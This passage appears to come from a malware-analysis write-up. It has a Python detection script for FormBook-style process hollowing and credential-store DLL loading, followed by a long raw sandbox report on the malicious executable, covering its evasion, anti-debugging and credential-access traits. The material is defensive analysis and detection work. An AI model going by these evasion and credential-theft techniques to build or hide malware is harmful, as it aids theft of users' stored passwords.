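    loaded: list[str] = field(default_factory=list)  # DLL base names loaded later


def _base(path: str) -> str:
    return ntpath.basename(path.strip().strip('"')).lower()


def _argv0(cmdline: str) -> str:
    """Executable named in argv[0] of a Windows command line (quoted or not)."""
    s = cmdline.strip()
    if s.startswith('"'):
        return s[1:s.index('"', 1)]
    return s.split(" ", 1)[0]


def _in_system_dir(path: str) -> bool:
    return path.lower().startswith(SYSTEM_DIRS)


def analyse(ev: ProcEvent) -> list[str]:
    """Return the suspicious-behaviour findings for one process."""
    hits: list[str] = []
    img = _base(ev.image)
    argv0 = _base(_argv0(ev.cmdline))
    # 1. Running image differs from the executable named on its own command line:
    #    the mark of a hollowed host (svchost.exe created with the dropper's
    #    command line in the report).
    if argv0 and argv0 != img:
        hits.append(f"image/cmdline mismatch: {img} started as {argv0}")
    # 2. A browser launched by a binary living in System32/SysWOW64 rather than
    #    by the shell: the second-stage host starting its final injection target.
    if img in BROWSERS and _in_system_dir(ev.parent_image):
        hits.append(f"browser {img} launched by system binary {_base(ev.parent_image)}")
    # 3. A non-browser process loading the whole credential-store DLL set.
    loaded = {d.lower() for d in ev.loaded}
    if img not in BROWSERS and CRED_STORE_DLLS <= loaded:
        hits.append(f"credential-store DLLs loaded by {img}: " + ", ".join(sorted(CRED_STORE_DLLS)))
    return hits


def analyse_all(events: list[ProcEvent]) -> dict[int, list[str]]:
    return {ev.pid: analyse(ev) for ev in events}


# Constructed events modelled on the report's process chain (pids are invented).
DROPPER = r"C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe"
STAGE2 = r"C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe"
REPORT_EVENTS = [
    ProcEvent(1, r"C:\Windows\SysWOW64\svchost.exe", f'"{DROPPER}"', DROPPER),
    ProcEvent(3, r"C:\Windows\SysWOW64\RMActivate_ssp.exe",
              r'"C:\Windows\SysWOW64\RMActivate_ssp.exe"', STAGE2,
              ["cryptsp.dll", "wininet.dll", "winsqlite3.dll", "vaultcli.dll", "dpapi.dll", "cryptbase.dll"]),
    ProcEvent(8, r"C:\Program Files\Mozilla Firefox\firefox.exe",
              r'"C:\Program Files\Mozilla Firefox\Firefox.exe"', r"C:\Windows\SysWOW64\RMActivate_ssp.exe"),
    # Benign control (constructed): a browser started from the shell loading the same DLLs.
    ProcEvent(9, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r'"C:\Program Files\Google\Chrome\Application\chrome.exe"', r"C:\Windows\explorer.exe",
              ["winsqlite3.dll", "vaultcli.dll", "dpapi.dll"]),
]

if __name__ == "__main__":
    for pid, hits in analyse_all(REPORT_EVENTS).items():
        print(pid, hits or "no findings")
```

Run as a script it prints one finding each for the three report processes and none for the control event. The mismatch check is the most portable of the three: it does not depend on which system binary FormBook picks as its host, only on the host's command line naming a different executable, which is exactly what the process-creation lines above show for svchost.exe.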
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Static file information: File size 1220608 > 1048576
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ZQphKCYQofBW.exe, 00000002.00000002.3540260087.00000000004EE000.00000002.00000001.01000000.00000004.sdmp, ZQphKCYQofBW.exe, 00000007.00000000.1945115829.00000000004EE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: rmactivate_ssp.pdb source: svchost.exe, 00000001.00000003.1844218176.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1844152538.000000000081A000.00000004.00000020.00020000.00000000.sdmp, ZQphKCYQofBW.exe, 00000002.00000002.3540722750.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, ZQphKCYQofBW.exe, 00000002.00000002.3548168948.00000000055D0000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe, 00000000.00000003.1696142681.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, PO 09110124 EXPRESS SYSTEM-SESB24066.exe, 00000000.00000003.1699178935.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1877718098.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1877718098.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1784461841.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1786172496.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.3541848537.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1882981823.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1881083378.0000000002B95000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.3541848537.000000000309E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe, 00000000.00000003.1696142681.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, PO 09110124 EXPRESS SYSTEM-SESB24066.exe, 00000000.00000003.1699178935.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1877718098.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1877718098.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1784461841.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1786172496.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, RMActivate_ssp.exe, 00000003.00000002.3541848537.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1882981823.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1881083378.0000000002B95000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.3541848537.000000000309E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RMActivate_ssp.exe, 00000003.00000002.3543103481.000000000352C000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.3540149813.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, ZQphKCYQofBW.exe, 00000007.00000002.3542289624.000000000325C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2214560535.0000000001D5C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RMActivate_ssp.exe, 00000003.00000002.3543103481.000000000352C000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.3540149813.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, ZQphKCYQofBW.exe, 00000007.00000002.3542289624.000000000325C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2214560535.0000000001D5C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: rmactivate_ssp.pdbGCTL source: svchost.exe, 00000001.00000003.1844218176.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1844152538.000000000081A000.00000004.00000020.00020000.00000000.sdmp, ZQphKCYQofBW.exe, 00000002.00000002.3540722750.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, ZQphKCYQofBW.exe, 00000002.00000002.3548168948.00000000055D0000.00000004.00000001.00020000.00000000.sdmp
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_003120F6 LoadLibraryA,GetProcAddress,0_2_003120F6
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_0031C6CC push esi; ret 0_2_0031C6CE
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002DCB5D push edi; ret 0_2_002DCB5F
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002DCC76 push esi; ret 0_2_002DCC78
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002DCE51 push esi; ret 0_2_002DCE53
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002DCF3A push edi; ret 0_2_002DCF3C
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002D7795 push ecx; ret 0_2_002D77A8
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002FBB9D push FFFFFF8Bh; iretd 0_2_002FBB9F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003519A7 push es; retf 1_2_00351A2B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00358818 push edi; ret 1_2_003588A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00356005 push ds; ret 1_2_00356010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00351A29 push es; retf 1_2_00351A2B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003644AE push ebx; iretd 1_2_003644AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00364CD3 push edi; iretd 1_2_00364CE1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00351522 push esi; iretd 1_2_003515F7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00351566 push esi; iretd 1_2_003515F7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0035159A push esi; iretd 1_2_003515F7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003645E3 push edx; ret 1_2_00364605
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003537A0 push eax; ret 1_2_003537A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00357784 push esi; iretd 1_2_0035779A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0036EF85 pushad ; ret 1_2_0036EF4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0035AF8E push ebp; retf 1_2_0035AFA2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00356FD7 push cs; ret 1_2_00356FD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300225F pushad ; ret 1_2_030027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030027FA pushad ; ret 1_2_030027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030309AD push ecx; mov dword ptr [esp], ecx1_2_030309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300283D push eax; iretd 1_2_03002858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300135E push eax; iretd 1_2_03001369
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeCode function: 2_2_038863EC pushfd ; ret 2_2_03886447
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeCode function: 2_2_03884A19 push ebx; iretd 2_2_03884A1A
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeCode function: 2_2_03885238 push edi; iretd 2_2_0388524C
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeCode function: 2_2_03878D83 push edi; ret 2_2_03878E0F
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002CF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_002CF78E
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_00317F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00317F0E
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002D1E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_002D1E5A
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe API/Special instruction interceptor: Address: 3BC3224
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe API/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe API/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe API/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe API/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe API/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe API/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0307096E rdtsc 1_2_0307096E
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Window / User API: threadDelayed 9841
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Evaded block: after key decision graph_0-103635
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Evaded block: after key decision graph_0-104430
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-104088
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe API coverage: 4.7 %
            Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.6 %
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe API coverage: 2.7 %
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 7552 Thread sleep count: 132 > 30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 7552 Thread sleep time: -264000s >= -30000s
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 7552 Thread sleep count: 9841 > 30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 7552 Thread sleep time: -19682000s >= -30000s
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe TID: 7636 Thread sleep time: -60000s >= -30000s
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe TID: 7636 Thread sleep time: -39000s >= -30000s
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_002CDD92 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_002CDD92
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_00302044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00302044
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_0030219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0030219F
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_003024A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_003024A9
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_002F6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_002F6B3F
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_002F6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_002F6E4A
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_002FF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_002FF350
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_002FFD47 FindFirstFileW,FindClose, 0_2_002FFD47
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_002FFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_002FFDD2
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_025AC380 FindFirstFileW,FindNextFileW,FindClose, 3_2_025AC380
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_002CE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_002CE47B
            Source: ZQphKCYQofBW.exe, 00000007.00000002.3541042170.00000000012CF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
            Source: RMActivate_ssp.exe, 00000003.00000002.3540149813.00000000028B2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
            Source: firefox.exe, 00000008.00000002.2215915696.0000026B41D5D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe API call chain: ExitProcess graph end node graph_0-103437
            Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0307096E rdtsc 1_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00367A93 LdrLoadDll, 1_2_00367A93
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_0030703C BlockInput, 0_2_0030703C
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_002B374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW, 0_2_002B374E
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_002E46D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW, 0_2_002E46D0
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_003120F6 LoadLibraryA,GetProcAddress, 0_2_003120F6
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_03BC3490 mov eax, dword ptr fs:[00000030h] 0_2_03BC3490
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_03BC34F0 mov eax, dword ptr fs:[00000030h] 0_2_03BC34F0
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_03BC1E70 mov eax, dword ptr fs:[00000030h] 0_2_03BC1E70
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h] 1_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0302C310 mov ecx, dword ptr fs:[00000030h] 1_2_0302C310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03050310 mov ecx, dword ptr fs:[00000030h] 1_2_03050310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03108324 mov eax, dword ptr fs:[00000030h] 1_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03108324 mov ecx, dword ptr fs:[00000030h] 1_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h] 1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030B035C mov eax, dword ptr fs:[00000030h] 1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030B035C mov ecx, dword ptr fs:[00000030h] 1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030FA352 mov eax, dword ptr fs:[00000030h] 1_2_030FA352
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030D8350 mov ecx, dword ptr fs:[00000030h] 1_2_030D8350
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0310634F mov eax, dword ptr fs:[00000030h] 1_2_0310634F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030D437C mov eax, dword ptr fs:[00000030h] 1_2_030D437C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h] 1_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0305438F mov eax, dword ptr fs:[00000030h] 1_2_0305438F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03028397 mov eax, dword ptr fs:[00000030h] 1_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030EC3CD mov eax, dword ptr fs:[00000030h] 1_2_030EC3CD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h] 1_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030B63C0 mov eax, dword ptr fs:[00000030h] 1_2_030B63C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030DE3DB mov eax, dword ptr fs:[00000030h] 1_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030DE3DB mov ecx, dword ptr fs:[00000030h] 1_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030D43D4 mov eax, dword ptr fs:[00000030h] 1_2_030D43D4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h] 1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030663FF mov eax, dword ptr fs:[00000030h] 1_2_030663FF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0302823B mov eax, dword ptr fs:[00000030h] 1_2_0302823B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030B8243 mov eax, dword ptr fs:[00000030h] 1_2_030B8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030B8243 mov ecx, dword ptr fs:[00000030h] 1_2_030B8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0310625D mov eax, dword ptr fs:[00000030h] 1_2_0310625D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0302A250 mov eax, dword ptr fs:[00000030h] 1_2_0302A250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03036259 mov eax, dword ptr fs:[00000030h] 1_2_03036259
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030EA250 mov eax, dword ptr fs:[00000030h] 1_2_030EA250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03034260 mov eax, dword ptr fs:[00000030h] 1_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0302826B mov eax, dword ptr fs:[00000030h] 1_2_0302826B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h] 1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0306E284 mov eax, dword ptr fs:[00000030h] 1_2_0306E284
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h] 1_2_030B0283
